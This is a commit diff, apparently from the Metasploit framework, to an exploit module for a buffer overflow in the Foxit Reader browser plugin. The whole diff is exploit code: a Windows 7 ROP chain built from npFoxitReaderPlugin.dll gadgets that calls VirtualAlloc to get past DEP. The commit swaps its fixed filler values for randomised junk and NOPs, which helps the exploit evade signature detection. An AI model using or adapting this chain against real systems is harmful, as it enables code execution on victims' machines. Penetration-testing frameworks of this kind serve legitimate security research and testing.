Randomize some gadgets

sinn3r · sinn3r · commit 4074a12fd7af · 2013-02-13T14:12:52.000-06:00
diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -92,37 +92,45 @@ def get_target(agent)
 		return nil
 	end
 
+	def junk
+		return rand_text_alpha(4).unpack("L")[0].to_i
+	end
+
+	def nops
+		make_nops(4).unpack("N*")
+	end
+
 	# Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
 	def win7_rop_chain
 
 		# rop chain generated with mona.py - www.corelan.be
 		rop_gadgets =
 			[
-				0x1000ce1a,	# POP EAX # RETN [npFoxitReaderPlugin.dll]
-				0x100361a8,	# ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
-				0x1000f055,	# MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
-				0x10021081,	# PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
-				0x10007971,	# POP EBP # RETN [npFoxitReaderPlugin.dll]
-				0x41414141,	# Filler (RETN offset compensation)
-				0x1000614c,	# & push esp # ret  [npFoxitReaderPlugin.dll]
-				0x100073fa,	# POP EBX # RETN [npFoxitReaderPlugin.dll]
-				0x00001000,	# 0x00001000-> edx
+				0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
+				0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
+				0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
+				0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
+				0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
+				0x41414141, # Filler (RETN offset compensation)
+				0x1000614c, # & push esp # ret  [npFoxitReaderPlugin.dll]
+				0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
+				0x00001000, # 0x00001000-> edx
 				0x1000d9ec, # XOR EDX, EDX # RETN
-				0x1000d9be,	# ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
-				0x41414141,	# Filler (compensate)
-				0x100074a7,	# POP ECX # RETN [npFoxitReaderPlugin.dll]
-				0x41414141,	# Filler (RETN offset compensation)
-				0x41414141,	# Filler (RETN offset compensation)
-				0x41414141,	# Filler (RETN offset compensation)
-				0x41414141,	# Filler (RETN offset compensation)
-				0x00000040,	# 0x00000040-> ecx
-				0x1000e4ab,	# POP EBX # RETN [npFoxitReaderPlugin.dll]
-				0x00000001,	# 0x00000001-> ebx
-				0x1000dc86,	# POP EDI # RETN [npFoxitReaderPlugin.dll]
-				0x1000eb81,	# RETN (ROP NOP) [npFoxitReaderPlugin.dll]
-				0x1000c57d,	# POP EAX # RETN [npFoxitReaderPlugin.dll]
-				0x90909090,	# nop
-				0x10005638,	# PUSHAD # RETN [npFoxitReaderPlugin.dll]
+				0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
+				junk,
+				0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
+				junk,
+				junk,
+				junk,
+				0x41414141, # Filler (RETN offset compensation)
+				0x00000040, # 0x00000040-> ecx
+				0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
+				0x00000001, # 0x00000001-> ebx
+				0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
+				0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
+				0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
+				nops,
+				0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
 			].flatten.pack("V*")
 
 		return rop_gadgets
